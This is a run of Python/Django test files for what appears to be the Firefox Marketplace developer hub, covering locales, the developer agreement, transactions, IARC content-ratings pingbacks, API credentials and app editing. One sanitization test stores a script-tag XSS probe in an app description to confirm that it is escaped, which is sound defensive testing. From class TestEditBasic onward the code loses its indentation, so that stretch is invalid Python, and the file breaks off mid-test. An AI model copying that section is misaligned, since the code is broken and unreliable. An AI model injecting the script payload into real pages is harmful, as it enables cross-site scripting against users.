        self.webapp.remove_locale('el')
        res = self.client.post(self.url, {'locale': 'el'})
        eq_(res.status_code, 200)
        # Only the two remaining locales of the name should survive.
        locales = (Translation.objects.filter(localized_string__isnull=False)
                   .values_list('locale', flat=True)
                   .filter(id=self.webapp.name_id))
        eq_(list(locales), ['en-US', 'es'])

    def test_delete_default_locale(self):
        # The default locale can never be removed.
        res = self.client.post(self.url,
                               {'locale': self.webapp.default_locale})
        eq_(res.status_code, 400)
class TestTerms(amo.tests.TestCase):
    """Tests for the developer agreement ("terms") page.

    Covers display of the agreement, acceptance via POST, re-acceptance
    after the agreement text is updated, localization of the agreement
    template, and redirect handling after acceptance.
    """
    fixtures = ['base/users']

    def setUp(self):
        self.user = self.get_user()
        self.client.login(username=self.user.email, password='password')
        self.url = reverse('mkt.developers.apps.terms')

    def get_user(self):
        return UserProfile.objects.get(email='[email protected]')

    def test_login_required(self):
        self.client.logout()
        self.assertLoginRequired(self.client.get(self.url))

    def test_accepted(self):
        # A user who already accepted sees the agreement but no form.
        self.user.update(read_dev_agreement=datetime.datetime.now())
        res = self.client.get(self.url)
        doc = pq(res.content)
        eq_(doc('#dev-agreement').length, 1)
        eq_(doc('#agreement-form').length, 0)

    def test_not_accepted(self):
        # A user who has not accepted is shown the acceptance form.
        self.user.update(read_dev_agreement=None)
        res = self.client.get(self.url)
        doc = pq(res.content)
        eq_(doc('#dev-agreement').length, 1)
        eq_(doc('#agreement-form').length, 1)

    def test_accept(self):
        self.user.update(read_dev_agreement=None)
        res = self.client.post(self.url, {'read_dev_agreement': 'yeah'})
        eq_(res.status_code, 200)
        assert self.get_user().read_dev_agreement

    @mock.patch.object(settings, 'DEV_AGREEMENT_LAST_UPDATED',
                       amo.tests.days_ago(-5).date())
    def test_update(self):
        # Agreement updated after the user's old acceptance: accepting
        # again must refresh the stored timestamp.
        past = self.days_ago(10)
        self.user.update(read_dev_agreement=past)
        res = self.client.post(self.url, {'read_dev_agreement': 'yeah'})
        eq_(res.status_code, 200)
        assert self.get_user().read_dev_agreement != past

    @mock.patch.object(settings, 'DEV_AGREEMENT_LAST_UPDATED',
                       amo.tests.days_ago(-5).date())
    def test_past(self):
        # Stale acceptance: show the site notice and the form again.
        past = self.days_ago(10)
        self.user.update(read_dev_agreement=past)
        res = self.client.get(self.url)
        doc = pq(res.content)
        eq_(doc('#site-notice').length, 1)
        eq_(doc('#dev-agreement').length, 1)
        eq_(doc('#agreement-form').length, 1)

    def test_not_past(self):
        res = self.client.get(self.url)
        doc = pq(res.content)
        eq_(doc('#site-notice').length, 0)
        eq_(doc('#dev-agreement').length, 1)
        eq_(doc('#agreement-form').length, 0)

    def test_l10n_good(self):
        # Each available locale renders its own agreement template.
        for locale in ('en-US', 'es', 'pl'):
            res = self.client.get(self.url, {'lang': locale})
            eq_(res.status_code, 200)
            self.assertTemplateUsed(res, 'dev-agreement/%s.html' % locale)

    def test_l10n_fallback(self):
        # Unknown locales fall back to the en-US template.
        res = self.client.get(self.url, {'lang': 'swag'})
        eq_(res.status_code, 200)
        self.assertTemplateUsed(res, 'dev-agreement/en-US.html')

    def test_redirect_to_relative(self):
        api_url = reverse('mkt.developers.apps.api')
        res = self.client.post(urlparams(self.url, to=api_url),
                               {'read_dev_agreement': 'yeah'})
        self.assert3xx(res, api_url)

    def test_redirect_to_external(self):
        # External ?to= targets are refused: no redirect is issued.
        res = self.client.post(urlparams(self.url, to='https://hy.fr'),
                               {'read_dev_agreement': 'yeah'})
        eq_(res.status_code, 200)
class TestTransactionList(amo.tests.TestCase):
    """Listing and filtering a developer's payment transactions."""
    fixtures = fixture('user_999')

    def setUp(self):
        """Create and set up apps for some filtering fun."""
        self.create_switch(name='view-transactions')
        self.url = reverse('mkt.developers.transactions')
        self.client.login(username='[email protected]', password='password')
        # Two apps owned by the user, each receiving one transaction.
        self.apps = [app_factory(), app_factory()]
        self.user = UserProfile.objects.get(id=999)
        for app in self.apps:
            AddonUser.objects.create(addon=app, user=self.user)
        # Set up transactions.
        tx0 = Contribution.objects.create(addon=self.apps[0],
                                          type=amo.CONTRIB_PURCHASE,
                                          user=self.user,
                                          uuid=12345)
        tx1 = Contribution.objects.create(addon=self.apps[1],
                                          type=amo.CONTRIB_REFUND,
                                          user=self.user,
                                          uuid=67890)
        # Distinct creation dates so the date filters below can tell the
        # two transactions apart.
        tx0.update(created=datetime.date(2011, 12, 25))
        tx1.update(created=datetime.date(2012, 1, 1))
        self.txs = [tx0, tx1]

    def test_200(self):
        r = self.client.get(self.url)
        eq_(r.status_code, 200)

    def test_own_apps(self):
        """Only user's transactions are shown."""
        # An unrelated app that must not appear in the results.
        app_factory()
        r = RequestFactory().get(self.url)
        r.user = self.user
        transactions = _get_transactions(r)[1]
        self.assertSetEqual([tx.addon for tx in transactions], self.apps)

    def test_filter(self):
        """For each field in the form, run it through view and check results.
        """
        tx0 = self.txs[0]
        tx1 = self.txs[1]
        self.do_filter(self.txs)
        # Bogus values: no filters should be applied.
        self.do_filter(self.txs, transaction_type='None', app='oshawott')
        self.do_filter([tx0], app=tx0.addon.id)
        self.do_filter([tx1], app=tx1.addon.id)
        self.do_filter([tx0], transaction_type=tx0.type)
        self.do_filter([tx1], transaction_type=tx1.type)
        self.do_filter([tx0], transaction_id=tx0.uuid)
        self.do_filter([tx1], transaction_id=tx1.uuid)
        self.do_filter(self.txs, date_from=datetime.date(2011, 12, 1))
        self.do_filter([tx1], date_from=datetime.date(2011, 12, 30),
                       date_to=datetime.date(2012, 2, 1))

    def do_filter(self, expected_txs, **kw):
        """Checks that filter returns the expected ids
        expected_ids -- list of app ids expected in the result.
        """
        qs = _filter_transactions(Contribution.objects.all(), kw)
        self.assertSetEqual(qs.values_list('id', flat=True),
                            [tx.id for tx in expected_txs])
class TestContentRatings(amo.tests.TestCase):
    """The IARC content-ratings pages in the developer hub."""
    fixtures = fixture('user_admin', 'user_admin_group', 'group_admin')

    def setUp(self):
        self.create_switch('iarc')
        self.app = app_factory()
        self.app.latest_version.update(
            _developer_name='Lex Luthor <[email protected]>')
        # Fixtures contain a single user, so get() needs no filter.
        self.user = UserProfile.objects.get()
        self.url = reverse('mkt.developers.apps.ratings',
                           args=[self.app.app_slug])
        self.req = amo.tests.req_factory_factory(self.url, user=self.user)
        self.req.session = mock.MagicMock()

    @override_settings(IARC_SUBMISSION_ENDPOINT='https://yo.lo',
                       IARC_STOREFRONT_ID=1, IARC_PLATFORM='Firefox',
                       IARC_PASSWORD='s3kr3t')
    def test_edit(self):
        # The edit page posts a hidden form directly to the IARC endpoint.
        r = content_ratings_edit(self.req, app_slug=self.app.app_slug)
        doc = pq(r.content)
        # Check the form action.
        form = doc('#ratings-edit form')[0]
        eq_(form.action, 'https://yo.lo')
        # Check the hidden form values.
        values = dict(form.form_values())
        eq_(values['storefront'], '1')
        # Note: The HTML is actually double escaped but pyquery shows it how it
        # will be send to IARC, which is singly escaped.
        eq_(values['company'], 'Lex Luthor <[email protected]>')
        eq_(values['email'], self.user.email)
        eq_(values['appname'], get_iarc_app_title(self.app))
        eq_(values['platform'], 'Firefox')
        eq_(values['token'], self.app.iarc_token())
        eq_(values['pingbackurl'],
            absolutify(reverse('content-ratings-pingback',
                               args=[self.app.app_slug])))

    def test_edit_default_locale(self):
        """Ensures the form uses the app's default locale."""
        self.app.name = {'es': u'Español', 'en-US': 'English'}
        self.app.default_locale = 'es'
        self.app.save()
        r = content_ratings_edit(self.req, app_slug=self.app.app_slug)
        doc = pq(r.content.decode('utf-8'))
        eq_(u'Español' in
            dict(doc('#ratings-edit form')[0].form_values())['appname'],
            True)
        self.app.update(default_locale='en-US')
        r = content_ratings_edit(self.req, app_slug=self.app.app_slug)
        doc = pq(r.content.decode('utf-8'))
        eq_(u'English' in
            dict(doc('#ratings-edit form')[0].form_values())['appname'],
            True)

    def test_summary(self):
        # One saved rating per ratings body; the summary page must list
        # each body by name, in order.
        rbs = mkt.ratingsbodies
        ratings = [rbs.CLASSIND_L, rbs.GENERIC_3, rbs.USK_18, rbs.ESRB_M,
                   rbs.PEGI_12]
        for rating in ratings:
            ContentRating.objects.create(
                addon=self.app, ratings_body=rating.ratingsbody.id,
                rating=rating.id)
        r = content_ratings(self.req, app_slug=self.app.app_slug)
        doc = pq(r.content)
        for i, name in enumerate(doc('.name')):
            eq_(name.text, ratings[i].ratingsbody.name)

    def test_edit_iarc_app_form(self):
        # IARC submission/security fields start empty, then are
        # pre-filled once the app has IARC info.
        r = content_ratings_edit(self.req, app_slug=self.app.app_slug)
        doc = pq(r.content)
        assert not doc('#id_submission_id').attr('value')
        assert not doc('#id_security_code').attr('value')
        self.app.set_iarc_info(1234, 'abcd')
        r = content_ratings_edit(self.req, app_slug=self.app.app_slug)
        doc = pq(r.content)
        eq_(doc('#id_submission_id').attr('value'), '1234')
        eq_(doc('#id_security_code').attr('value'), 'abcd')
class TestContentRatingsSuccessMsg(amo.tests.TestCase):
    """Which success message is flashed after saving content ratings."""

    def setUp(self):
        self.app = app_factory(status=amo.STATUS_NULL)

    def _make_complete(self, complete_errs):
        # NOTE(review): this helper is never called by the tests below,
        # so the patched `completion_errors` mocks stay unconfigured and
        # return a (truthy) Mock instead of {} -- confirm intent.
        complete_errs.return_value = {}

    def _rate_app(self):
        # Attach a minimal content rating to the app.
        self.app.content_ratings.create(ratings_body=0, rating=0)

    def test_create_rating_still_incomplete(self):
        self._rate_app()
        eq_(_ratings_success_msg(self.app, amo.STATUS_NULL, None),
            _submission_msgs()['content_ratings_saved'])

    @mock.patch('mkt.webapps.models.Webapp.completion_errors')
    def test_create_rating_now_complete(self, complete_errs):
        # Rating the app flipped it from incomplete to pending: show the
        # 'complete' message.
        self._rate_app()
        self.app.update(status=amo.STATUS_PENDING)
        eq_(_ratings_success_msg(self.app, amo.STATUS_NULL, None),
            _submission_msgs()['complete'])

    @mock.patch('mkt.webapps.models.Webapp.completion_errors')
    def test_create_rating_public_app(self, complete_errs):
        self._rate_app()
        self.app.update(status=amo.STATUS_PUBLIC)
        eq_(_ratings_success_msg(self.app, amo.STATUS_PUBLIC, None),
            _submission_msgs()['content_ratings_saved'])

    @mock.patch('mkt.webapps.models.Webapp.completion_errors')
    def test_update_rating_still_complete(self, complete_errs):
        self._rate_app()
        self.app.update(status=amo.STATUS_PENDING)
        eq_(_ratings_success_msg(self.app, amo.STATUS_PENDING,
                                 self.days_ago(5).isoformat()),
            _submission_msgs()['content_ratings_saved'])
########NEW FILE########
__FILENAME__ = test_views_api
# -*- coding: utf-8 -*-
import json
from django.core.urlresolvers import NoReverseMatch
from django.core.urlresolvers import reverse
from django.test.utils import override_settings
import mock
from nose.tools import eq_
import amo.tests
import mkt
from amo.utils import urlparams
from mkt.api.models import Access
from mkt.api.tests.test_oauth import RestOAuth
from mkt.site.fixtures import fixture
from mkt.webapps.models import ContentRating, Geodata
from users.models import UserProfile
class TestAPI(amo.tests.TestCase):
    """Managing OAuth API credentials from the developer hub."""
    fixtures = fixture('user_999')

    def setUp(self):
        self.profile = UserProfile.objects.get(pk=999)
        self.user = self.profile
        self.login(self.profile)
        self.url = reverse('mkt.developers.apps.api')

    def test_logged_out(self):
        self.client.logout()
        self.assertLoginRequired(self.client.get(self.url))

    def test_non_url(self):
        # A non-http(s) redirect URI is rejected by form validation.
        res = self.client.post(
            self.url,
            {'app_name': 'test', 'redirect_uri': 'mailto:[email protected]'})
        self.assertFormError(res, 'form', 'redirect_uri',
                             ['Enter a valid URL.'])

    def test_create(self):
        Access.objects.create(user=self.user, key='foo', secret='bar')
        res = self.client.post(
            self.url,
            {'app_name': 'test', 'redirect_uri': 'https://example.com/myapp'})
        self.assertNoFormErrors(res)
        eq_(res.status_code, 200)
        # The pre-existing credential plus the newly created one.
        consumers = Access.objects.filter(user=self.user)
        eq_(len(consumers), 2)
        eq_(consumers[1].key, 'mkt:999:[email protected]:1')

    def test_delete(self):
        access = Access.objects.create(user=self.user, key='foo',
                                       secret='bar')
        res = self.client.post(self.url,
                               {'delete': 'yep', 'consumer': access.pk})
        eq_(res.status_code, 200)
        eq_(Access.objects.filter(user=self.user).count(), 0)

    def test_admin(self):
        # Admins may not create API credentials here.
        self.grant_permission(self.profile, 'What:ever', name='Admins')
        res = self.client.post(self.url)
        eq_(res.status_code, 200)
        eq_(Access.objects.filter(user=self.user).count(), 0)

    def test_other(self):
        # Non-admin users with unrelated permissions still may.
        self.grant_permission(self.profile, 'What:ever')
        res = self.client.post(
            self.url,
            {'app_name': 'test', 'redirect_uri': 'http://example.com/myapp'})
        eq_(res.status_code, 200)
        eq_(Access.objects.filter(user=self.user).count(), 1)
class TestContentRating(amo.tests.TestCase):
    """Read-only content-ratings API for a single app."""

    def setUp(self):
        self.app = amo.tests.app_factory()

    def test_get_content_ratings(self):
        for body in (mkt.ratingsbodies.CLASSIND, mkt.ratingsbodies.ESRB):
            ContentRating.objects.create(addon=self.app, ratings_body=body.id,
                                         rating=0)
        url = reverse('content-ratings-list', args=[self.app.app_slug])
        res = self.client.get(url)
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(len(data['objects']), 2)
        first = data['objects'][0]
        eq_(first['body'], 'classind')
        eq_(first['rating'], '0')

    def test_get_content_ratings_since(self):
        cr = ContentRating.objects.create(addon=self.app, ratings_body=0,
                                          rating=0)
        cr.update(modified=self.days_ago(100))
        # Nothing modified since the cutoff -> 404.
        res = self.client.get(urlparams(
            reverse('content-ratings-list', args=[self.app.app_slug]),
            since=self.days_ago(5)))
        eq_(res.status_code, 404)
        # After a fresh modification the rating shows up again.
        cr.update(modified=self.days_ago(1))
        res = self.client.get(urlparams(
            reverse('content-ratings-list', args=[self.app.id]),
            since=self.days_ago(5)))
        eq_(res.status_code, 200)
        eq_(len(json.loads(res.content)['objects']), 1)

    def test_view_whitelist(self):
        """Only -list, no create/update/delete."""
        for action in ('create', 'update', 'delete'):
            with self.assertRaises(NoReverseMatch):
                reverse('content-ratings-%s' % action, args=[self.app.id])
        reverse('content-ratings-list', args=[self.app.app_slug])
@override_settings(SECRET_KEY='test')
class TestContentRatingPingback(RestOAuth):
    """Tests for the IARC content-ratings pingback endpoint.

    Fix: in `test_post_content_ratings_pingback` the two mock arguments
    were named in the wrong order. `mock.patch` decorators apply
    bottom-up, so the innermost patch (`set_iarc_storefront_data`)
    supplies the FIRST mock argument; the original signature labelled it
    `details_mock`, so the test configured and asserted against the
    wrong mocks. The parameter names are now swapped to match.
    """

    def setUp(self):
        super(TestContentRatingPingback, self).setUp()
        self.app = amo.tests.app_factory(status=amo.STATUS_NULL)
        self.url = reverse('content-ratings-pingback', args=[self.app.pk])
        # Simulated IARC pingback payload: one rating, one descriptor
        # list per ratings body, plus shared interactive elements.
        self.data = {
            'ROW': {
                'FIELD': [
                    {
                        'TYPE': 'int',
                        'NAME': 'rowId',
                        'VALUE': '1'
                    },
                    {
                        'TYPE': 'string',
                        'NAME': 'token',
                        'VALUE': self.app.iarc_token()
                    },
                    {
                        'TYPE': 'int',
                        'NAME': 'submission_id',
                        'VALUE': '52'
                    },
                    {
                        'TYPE': 'string',
                        'NAME': 'security_code',
                        'VALUE': 'AB12CD3'
                    },
                    {
                        'TYPE': 'string',
                        'NAME': 'title',
                        'VALUE': 'Twitter'
                    },
                    {
                        'TYPE': 'string',
                        'NAME': 'company',
                        'VALUE': 'Mozilla'
                    },
                    {
                        'TYPE': 'string',
                        'NAME': 'platform',
                        'VALUE': 'Firefox'
                    },
                    {
                        'TYPE': 'string',
                        'NAME': 'rating_PEGI',
                        'VALUE': '16+'
                    },
                    {
                        'TYPE': 'string',
                        'NAME': 'descriptors_PEGI',
                        'VALUE': 'Language,Online'
                    },
                    {
                        'TYPE': 'string',
                        'NAME': 'rating_USK',
                        'VALUE': 'Rating Refused'
                    },
                    {
                        'TYPE': 'string',
                        'NAME': 'descriptors_USK',
                        'VALUE': u'Explizite Sprache'
                    },
                    {
                        'TYPE': 'string',
                        'NAME': 'rating_ESRB',
                        'VALUE': 'Mature 17+'
                    },
                    {
                        'TYPE': 'string',
                        'NAME': 'descriptors_ESRB',
                        'VALUE': 'Strong Language'
                    },
                    {
                        'TYPE': 'string',
                        'NAME': 'rating_CLASSIND',
                        'VALUE': '14+'
                    },
                    {
                        'TYPE': 'string',
                        'NAME': 'descriptors_CLASSIND',
                        'VALUE': u'Linguagem Impr\xF3pria,Cont\xE9udo Sexual'
                    },
                    {
                        'TYPE': 'string',
                        'NAME': 'rating_Generic',
                        'VALUE': '16+'
                    },
                    {
                        'TYPE': 'string',
                        'NAME': 'descriptors_Generic',
                        'VALUE': ''
                    },
                    {
                        'TYPE': 'string',
                        'NAME': 'storefront',
                        'VALUE': 'Mozilla'
                    },
                    {
                        'TYPE': 'string',
                        'NAME': 'interactive_elements',
                        'VALUE': 'Shares Info,Shares Location,Digital Purchases,Users Interact'
                    }
                ]
            }
        }

    def test_slug_url(self):
        url = reverse('content-ratings-pingback', args=[self.app.app_slug])
        res = self.anon.post(url, data=json.dumps(self.data))
        eq_(res.status_code, 200)

    def test_invalid_content_type(self):
        # Only JSON payloads are accepted.
        res = self.anon.post(self.url, data=json.dumps(self.data),
                             content_type='application/xml')
        eq_(res.status_code, 415)
        res = self.anon.post(self.url, data=json.dumps(self.data),
                             content_type='application/x-www-form-urlencoded')
        eq_(res.status_code, 415)

    @mock.patch('mkt.webapps.models.Webapp.details_complete')
    @mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
    def test_post_content_ratings_pingback(self, storefront_mock,
                                           details_mock):
        # Decorators apply bottom-up: `set_iarc_storefront_data` is the
        # innermost patch and therefore the first mock argument.
        details_mock.return_value = True
        eq_(self.app.status, amo.STATUS_NULL)
        res = self.anon.post(self.url, data=json.dumps(self.data))
        eq_(res.status_code, 200)
        # Verify things were saved to the database.
        app = self.app.reload()
        # IARC info.
        eq_(app.iarc_info.submission_id, 52)
        eq_(app.iarc_info.security_code, 'AB12CD3')
        assert storefront_mock.called
        # Ratings.
        eq_(app.content_ratings.count(), 5)
        for rb, rating in [
            (mkt.ratingsbodies.CLASSIND, mkt.ratingsbodies.CLASSIND_14),
            (mkt.ratingsbodies.ESRB, mkt.ratingsbodies.ESRB_M),
            (mkt.ratingsbodies.GENERIC, mkt.ratingsbodies.GENERIC_16),
            (mkt.ratingsbodies.PEGI, mkt.ratingsbodies.PEGI_16),
            (mkt.ratingsbodies.USK, mkt.ratingsbodies.USK_REJECTED)]:
            eq_(app.content_ratings.get(ratings_body=rb.id).rating, rating.id,
                'Unexpected rating for rating body %s.' % rb)
        # Descriptors.
        self.assertSetEqual(
            app.rating_descriptors.to_keys(),
            ['has_classind_lang', 'has_classind_sex_content',
             'has_pegi_lang', 'has_pegi_online',
             'has_esrb_strong_lang',
             'has_usk_lang'])
        # Interactives.
        self.assertSetEqual(
            app.rating_interactives.to_keys(),
            ['has_shares_info', 'has_shares_location',
             'has_digital_purchases', 'has_users_interact'])
        eq_(app.status, amo.STATUS_PENDING)
        assert app.current_version.nomination

    @override_settings(SECRET_KEY='foo')
    def test_token_mismatch(self):
        # Token was generated under a different SECRET_KEY.
        res = self.anon.post(self.url, data=json.dumps(self.data))
        eq_(res.status_code, 400)
        eq_(json.loads(res.content)['detail'], 'Token mismatch')

    @mock.patch('mkt.webapps.models.Webapp.details_complete')
    def test_post_content_ratings_pingback_iarc_exclude(self, details_mock):
        details_mock.return_value = True
        self.app._geodata.update(region_br_iarc_exclude=True,
                                 region_de_iarc_exclude=True)
        self.anon.post(self.url, data=json.dumps(self.data))
        # Verify things were saved to the database.
        geodata = Geodata.objects.get(addon=self.app)
        assert not geodata.region_br_iarc_exclude
        assert not geodata.region_de_iarc_exclude

    @mock.patch('mkt.developers.views.ContentRatingsPingback.verify_data')
    @mock.patch('mkt.webapps.models.Webapp.details_complete',
                new=mock.Mock())
    @mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data',
                new=mock.Mock())
    def test_verify_data(self, verify_mock):
        # A payload failing verification yields a 400.
        verify_mock.return_value = False
        res = self.anon.post(self.url, data=json.dumps(self.data))
        eq_(res.status_code, 400)
########NEW FILE########
__FILENAME__ = test_views_edit
# -*- coding: utf-8 -*-
import json
import os
import tempfile
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.core.urlresolvers import reverse
from django.utils.encoding import smart_unicode
import mock
from nose import SkipTest
from nose.tools import eq_, ok_
from PIL import Image
from pyquery import PyQuery as pq
from tower import strip_whitespace
from waffle.models import Switch
import amo
import amo.tests
import mkt
from access.models import Group, GroupUser
from addons.models import (Addon, AddonCategory, AddonDeviceType, AddonUser,
Category)
from amo.helpers import absolutify
from amo.tests import assert_required, formset, initial
from amo.tests.test_helpers import get_image_path
from devhub.models import ActivityLog
from editors.models import RereviewQueue
from lib.video.tests import files as video_files
from mkt.comm.models import CommunicationNote
from mkt.constants import regions
from mkt.site.fixtures import fixture
from mkt.webapps.models import AddonExcludedRegion as AER
from translations.models import Translation
from users.models import UserProfile
from versions.models import Version
response_mock = mock.Mock()
response_mock.read.return_value = '''
{
"name": "Something Ballin!",
"description": "Goin' hard in the paint.",
"launch_path": "/ballin/4.eva",
"developer": {
"name": "Pro Balliner",
"url": "http://www.ballin4eva.xxx"
},
"icons": {
"128": "/ballin/icon.png"
},
"installs_allowed_from": [ "https://marketplace.firefox.com" ]
}
'''
response_mock.headers = {'Content-Type':
'application/x-web-app-manifest+json'}
def get_section_url(addon, section, edit=False):
    """Return the URL of `addon`'s edit `section`; append 'edit' mode if
    requested."""
    args = [addon.app_slug, section]
    if edit:
        args = args + ['edit']
    return reverse('mkt.developers.apps.section', args=args)
class TestEdit(amo.tests.TestCase):
    """Base class for the app edit-page tests below.

    Provides a logged-in developer, the app under edit, and helpers for
    comparing saved model state against a dict of expected values.
    """
    fixtures = fixture('group_admin', 'user_999', 'user_admin',
                       'user_admin_group', 'webapp_337141')

    def setUp(self):
        self.webapp = self.get_webapp()
        self.url = self.webapp.get_dev_url()
        self.user = UserProfile.objects.get(username='31337')
        assert self.client.login(username=self.user.email, password='password')

    def get_webapp(self):
        # Bypass the cache so we always see the current DB state.
        return Addon.objects.no_cache().get(id=337141)

    def get_url(self, section, edit=False):
        # URL of one edit section, optionally in edit mode.
        return get_section_url(self.webapp, section, edit)

    def get_dict(self, **kw):
        # Base POST data for edit forms.
        # NOTE(review): `self.cat_initial` is expected to be provided by
        # subclasses -- confirm before calling this from a new subclass.
        fs = formset(self.cat_initial, initial_count=1)
        result = {'name': 'new name', 'slug': 'test_slug',
                  'description': 'new description'}
        result.update(**kw)
        result.update(fs)
        return result

    def compare(self, data):
        """Compare an app against a `dict` of expected values."""
        # Map form field names to model attributes where the names differ.
        mapping = {
            'regions': 'get_region_ids'
        }
        webapp = self.get_webapp()
        for k, v in data.iteritems():
            k = mapping.get(k, k)
            val = getattr(webapp, k, '')
            if callable(val):
                val = val()
            if val is None:
                val = ''
            eq_(unicode(val), unicode(v))

    def compare_features(self, data, version=None):
        """
        Compare an app's set of required features against a `dict` of expected
        values.
        """
        if not version:
            version = self.get_webapp().current_version
        features = version.features
        for k, v in data.iteritems():
            val = getattr(features, k)
            if callable(val):
                val = val()
            eq_(unicode(val), unicode(v))

    def check_form_url(self, section):
        # NOTE(review): relies on `self.edit_url` being set by subclasses.
        # Check form destinations and "Edit" button.
        r = self.client.get(self.url)
        eq_(r.status_code, 200)
        doc = pq(r.content)
        eq_(doc('form').attr('action'), self.edit_url)
        eq_(doc('h2 .button').attr('data-editurl'), self.edit_url)
        # Check "Cancel" button.
        r = self.client.get(self.edit_url)
        eq_(pq(r.content)('form .addon-edit-cancel').attr('href'), self.url)
class TestEditListingWebapp(TestEdit):
    """The app Edit Listing landing page."""
    fixtures = fixture('webapp_337141')

    @mock.patch.object(settings, 'APP_PREVIEW', False)
    def test_apps_context(self):
        res = self.client.get(self.url)
        eq_(res.context['webapp'], True)
        eq_(pq(res.content)('title').text(),
            'Edit Listing | %s | Firefox Marketplace' % self.webapp.name)

    def test_redirect(self):
        # The non-'edit' URL redirects to the edit page.
        res = self.client.get(self.url.replace('edit', ''))
        self.assert3xx(res, self.url)

    def test_nav_links(self):
        nav = pq(self.client.get(self.url).content)('.edit-addon-nav')
        eq_(nav.length, 2)
        eq_(nav('.view-stats').length, 0)

    def test_edit_with_no_current_version(self):
        # Disable file for latest version, and then update
        # app.current_version.
        app = self.get_webapp()
        app.versions.latest().all_files[0].update(status=amo.STATUS_DISABLED)
        app.update_version()
        # Now try to display edit page.
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
@mock.patch.object(settings, 'TASK_USER_ID', 999)
class TestEditBasic(TestEdit):
fixtures = TestEdit.fixtures
def setUp(self):
super(TestEditBasic, self).setUp()
self.cat = Category.objects.create(name='Games', type=amo.ADDON_WEBAPP)
self.dtype = amo.DEVICE_TYPES.keys()[0]
AddonCategory.objects.create(addon=self.webapp, category=self.cat)
AddonDeviceType.objects.create(addon=self.webapp,
device_type=self.dtype)
self.url = self.get_url('basic')
self.edit_url = self.get_url('basic', edit=True)
def get_webapp(self):
return Addon.objects.get(id=337141)
def get_dict(self, **kw):
result = {'device_types': self.dtype, 'slug': 'NeW_SluG',
'description': 'New description with <em>html</em>!',
'manifest_url': self.webapp.manifest_url,
'categories': [self.cat.id]}
result.update(**kw)
return result
def test_form_url(self):
self.check_form_url('basic')
def test_apps_context(self):
eq_(self.client.get(self.url).context['webapp'], True)
def test_appslug_visible(self):
r = self.client.get(self.url)
eq_(r.status_code, 200)
eq_(pq(r.content)('#slug_edit').remove('a, em').text(),
absolutify(u'/\u2026/%s' % self.webapp.app_slug))
def test_edit_slug_success(self):
data = self.get_dict()
r = self.client.post(self.edit_url, data)
self.assertNoFormErrors(r)
eq_(r.status_code, 200)
webapp = self.get_webapp()
eq_(webapp.app_slug, data['slug'].lower())
# Make sure only the app_slug changed.
eq_(webapp.slug, self.webapp.slug)
def test_edit_slug_max_length(self):
r = self.client.post(self.edit_url, self.get_dict(slug='x' * 31))
self.assertFormError(r, 'form', 'slug',
'Ensure this value has at most 30 characters (it has 31).')
def test_edit_slug_dupe(self):
Addon.objects.create(type=amo.ADDON_WEBAPP, app_slug='dupe')
r = self.client.post(self.edit_url, self.get_dict(slug='dupe'))
self.assertFormError(r, 'form', 'slug',
'This slug is already in use. Please choose another.')
webapp = self.get_webapp()
# Nothing changed.
eq_(webapp.slug, self.webapp.slug)
eq_(webapp.app_slug, self.webapp.app_slug)
def test_edit_xss(self):
    """The description is sanitized: <b> survives, <script> is escaped.

    Fix: the expected markup contained a literal <script> tag, which
    can never match the escaped template output (and re-introduces the
    very payload the test guards against). Expect HTML entities.
    """
    self.webapp.description = ("This\n<b>IS</b>"
                               "<script>alert('awesome')</script>")
    self.webapp.save()
    r = self.client.get(self.url)
    eq_(pq(r.content)('#addon-description span[lang]').html(),
        "This<br/><b>IS</b>&lt;script&gt;alert('awesome')"
        '&lt;/script&gt;')
def test_view_manifest_url_default(self):
# Should be able to see manifest URL listed.
r = self.client.get(self.url)
eq_(pq(r.content)('#manifest-url a').attr('href'),
self.webapp.manifest_url)
# There should be a readonly text field.
r = self.client.get(self.edit_url)
row = pq(r.content)('#manifest-url')
eq_(row.find('input[name=manifest_url][readonly]').length, 1)
# POST with the new manifest URL.
url = 'https://ballin.com/ballin4eva'
r = self.client.post(self.edit_url, self.get_dict(manifest_url=url))
self.assertNoFormErrors(r)
# The manifest should remain unchanged since this is disabled for
# non-admins.
eq_(self.get_webapp().manifest_url, self.webapp.manifest_url)
def test_view_edit_manifest_url_empty(self):
# Empty manifest should throw an error.
r = self.client.post(self.edit_url, self.get_dict(manifest_url=''))
form = r.context['form']
assert 'manifest_url' in form.errors
assert 'This field is required' in form.errors['manifest_url'][0]
def test_view_admin_edit_manifest_url(self):
self.client.login(username='[email protected]', password='password')
# Should be able to see manifest URL listed.
r = self.client.get(self.url)
eq_(pq(r.content)('#manifest-url a').attr('href'),
self.webapp.manifest_url)
# Admins can edit the manifest URL and should see a text field.
r = self.client.get(self.edit_url)
row = pq(r.content)('#manifest-url')
eq_(row.find('input[name=manifest_url]').length, 1)
eq_(row.find('input[name=manifest_url][readonly]').length, 0)
# POST with the new manifest URL.
url = 'https://ballin.com/ballin4eva.webapp'
r = self.client.post(self.edit_url, self.get_dict(manifest_url=url))
self.assertNoFormErrors(r)
self.webapp = self.get_webapp()
eq_(self.webapp.manifest_url, url)
eq_(self.webapp.app_domain, 'https://ballin.com')
eq_(self.webapp.current_version.version, '1.0')
eq_(self.webapp.versions.count(), 1)
def test_view_manifest_changed_dupe_app_domain(self):
Switch.objects.create(name='webapps-unique-by-domain', active=True)
amo.tests.app_factory(name='Super Duper',
app_domain='https://ballin.com')
self.client.login(username='[email protected]', password='password')
# POST with the new manifest URL.
url = 'https://ballin.com/ballin4eva.webapp'
r = self.client.post(self.edit_url, self.get_dict(manifest_url=url))
form = r.context['form']
assert 'manifest_url' in form.errors
assert 'one app per domain' in form.errors['manifest_url'][0]
eq_(self.get_webapp().manifest_url, self.webapp.manifest_url,
'Manifest URL should not have been changed!')
def test_view_manifest_changed_same_domain_diff_path(self):
Switch.objects.create(name='webapps-unique-by-domain', active=True)
self.client.login(username='[email protected]', password='password')
# POST with the new manifest URL for same domain but w/ different path.
data = self.get_dict(manifest_url=self.webapp.manifest_url + 'xxx')
r = self.client.post(self.edit_url, data)
self.assertNoFormErrors(r)
eq_(self.get_webapp().manifest_url, self.webapp.manifest_url + 'xxx',
'Manifest URL should have changed!')
def test_view_manifest_url_changed(self):
new_url = 'http://omg.org/yes'
self.webapp.manifest_url = new_url
self.webapp.save()
# If we change the `manifest_url` manually, the URL here should change.
r = self.client.get(self.url)
